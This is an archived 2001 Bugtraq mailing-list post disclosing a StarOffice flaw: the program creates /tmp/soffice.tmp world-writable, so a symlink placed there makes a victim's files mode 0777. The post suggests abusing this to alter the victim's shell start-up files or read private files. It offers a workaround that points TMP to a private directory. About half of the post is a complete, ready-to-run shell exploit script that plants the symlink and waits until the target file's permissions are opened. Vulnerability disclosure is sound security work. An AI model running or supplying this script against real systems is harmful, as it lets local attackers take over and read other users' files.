Bugtraq mailing list archives
HeliSec: StarOffice symlink exploit
From: JeT Li <jet_li_man () yahoo com>
Date: Sat, 17 Feb 2001 16:57:23 +0100
- = Helios Security and Administration = - Hi everyone, StarOffice creates a temporary directory in /tmp called soffice.tmp, with permissions 0777. Into this directory other temporary files are creates, with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number. StarOffice not only create the /tmp/soffice.tmp directory with permissions 0777, but also chmod() it sometimes when StarOffice is runing afterwards. If any user create a symbolic link from /tmp/soffice.tmp to any file owned by other user, when this last user run StarOffice the target of the link will become 0777. So, if the directory of the target file is accessible by the maliciosous user that created the symlink, he can do whatever he wants with the file. A few ways to exploit this is: - to modify shell start-up files (as .profile, .bashrc, .cshrc, etc.) to execute whatever the hackers wants next time victim logs in. - to gain access to private files with sensitive information, as passwords files, mail spool files, etc. - a lot of more evil acts. StarOffice no give error message or such when it change the permissions of the target file, so from the victim point of view: all is going right ;-) Requeriments: - Access to the targe file directory needed. - The target file must NOT be executable. Fix: One way to fix the problem is to create a directory inside your home directory which is inaccessible to anyone but yourself (permissions 700), called tmp. Then insert an entry in your login start-up file to set the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to use your temporary directory, rather than the system /tmp. Something like this (in bash): [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP (not permanent) or modify the .bash_profile adding TMP=$HOME/tmp and including this variable in the export. Here is the xploit code, to make sure that this will work, run first staroffice, so you will become owner of /tmp/soffice.tmp, necessary to remove it and create the symlink. #!/bin/sh SOFFICE="/tmp/soffice.tmp" TARGETFILE=$1 if [ $# != 1 ]; then echo echo " - = HeliSec - Helios Security and Administration = -" echo "Usage : " echo "./soffice.sh <file>" echo "Set 0777 permissions to any file (access to the directory of the file needed)" echo " JeT Li -The Wushu Master-" exit fi if [ ! -f ${TARGETFILE} ]; then echo "Target file must exist" exit fi rm -rf ${SOFFICE} ln -sn ${TARGETFILE} ${SOFFICE} echo echo "Symbolik link done ..." echo perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ? print "StarOffice is running on this machine ... wait a minutes and the permissions will have been set.\n" : print "StarOffice is not running on this machine ...you may wait for the signal (not recommended) or CTRL+C the program; when the user run StarOffice the permissions will be set automaticly\n";' while : do if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then echo echo "Permissions set succesfully ... good luck ;-)" echo echo "- = HeliSec - Helios Security and Administration = -" echo " JeT Li -The Wushu Master-" exit fi done Cheers, JeT Li -The Wushu Master- _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com
Current thread:
- HeliSec: StarOffice symlink exploit JeT Li (Feb 19)
- Re: HeliSec: StarOffice symlink exploit Peter W (Feb 20)
- Re: HeliSec: StarOffice symlink exploit Christian (Feb 22)
- Re: HeliSec: StarOffice symlink exploit JeT Li (Feb 22)
- Re: HeliSec: StarOffice symlink exploit Kurt Seifried (Feb 22)